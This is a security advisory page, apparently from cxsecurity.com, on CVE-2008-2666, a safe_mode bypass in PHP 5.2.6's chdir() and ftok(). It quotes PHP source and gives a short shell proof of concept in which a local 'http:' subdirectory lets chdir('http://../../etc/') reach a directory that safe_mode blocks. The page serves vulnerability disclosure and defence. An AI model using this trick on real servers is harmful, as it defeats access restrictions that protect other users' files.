PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass

2008.06.17
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ] Author: Maksymilian Arciemowicz Date: - - Written: 10.05.2008 - - Public: 17.06.2008 CVE: CVE-2008-2666 CWE: CWE-264 Risk: Medium Affected Software: PHP 5.2.6 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. chdir ? Change directory SYNOPSIS: bool chdir ( string $directory ) http://pl.php.net/manual/en/function.chdir.php ftok ? Convert a pathname and a project identifier to a System V IPC key SYNOPSIS: int ftok ( string $pathname , string $proj ) http://pl.php.net/manual/en/function.ftok.php !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. WE WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass --- Let's see to chdir() function - --- PHP_FUNCTION(chdir) { char *str; int ret, str_len; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) { RETURN_FALSE; } if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) { RETURN_FALSE; } ret = VCWD_CHDIR(str); if (ret != 0) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno); RETURN_FALSE; } RETURN_TRUE; } - --- str is beeing checked by safe_mode example: - --- Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8 - --- in current directory, we should create subdir "http:". => it is possible to create chdir("http://../../../../../../") and we are in / Why? TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC))) for str="http://../../../../../../" safe_mode will ignore all paths with http:// that same situation with ftok() function (and more) - ---EXAMPLE1--- cxib# cat /www/wufff.php <? echo getcwd()."\n"; chdir("/etc/"); echo getcwd()."\n"; ?> cxib# ls -la /www/wufff.php - -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php cxib# php /www/wufff.php /www Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3 /www cxib# - ---/EXAMPLE1--- - ---EXAMPLE2--- cxib# ls -la /www/wufff.php - -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php cxib# ls -la /www/http: total 8 drwxr-xr-x 2 www www 512 Jun 17 17:12 . drwxr-xr-x 19 www www 4608 Jun 17 17:13 .. cxib# cat /www/wufff.php <? echo getcwd()."\n"; chdir("http://../../etc/"); echo getcwd()."\n"; ?> cxib# php /www/wufff.php /www /etc cxib# - ---/EXAMPLE2--- !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. We WILL WILL NOT LISTS ALL VULNERABLE FUNCTIONS - --- 2. How to fix --- Do not use safe_mode as a main safety - --- 3. Contact --- Author: Maksymilian Arciemowicz

References:

References:
http://www.us-cert.gov/cas/techalerts/TA09-133A.html
http://xforce.iss.net/xforce/xfdb/43198
http://www.vupen.com/english/advisories/2009/1297
http://www.securitytracker.com/id?1020328
http://www.securityfocus.com/bid/29796
http://www.securityfocus.com/archive/1/archive/1/501376/100/0/threaded
http://wiki.rpath.com/Advisories:rPSA-2009-0035
http://support.apple.com/kb/HT3549
http://securityreason.com/securityalert/3942
http://securityreason.com/achievement_securityalert/55
http://secunia.com/advisories/35650
http://secunia.com/advisories/35074
http://marc.info/?l=bugtraq&m=125631037611762&w=2
http://marc.info/?l=bugtraq&m=125631037611762&w=2
http://marc.info/?l=bugtraq&m=124654546101607&w=2
http://marc.info/?l=bugtraq&m=124654546101607&w=2
http://lists.apple.com/archives/security-announce/2009/May/msg00002.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top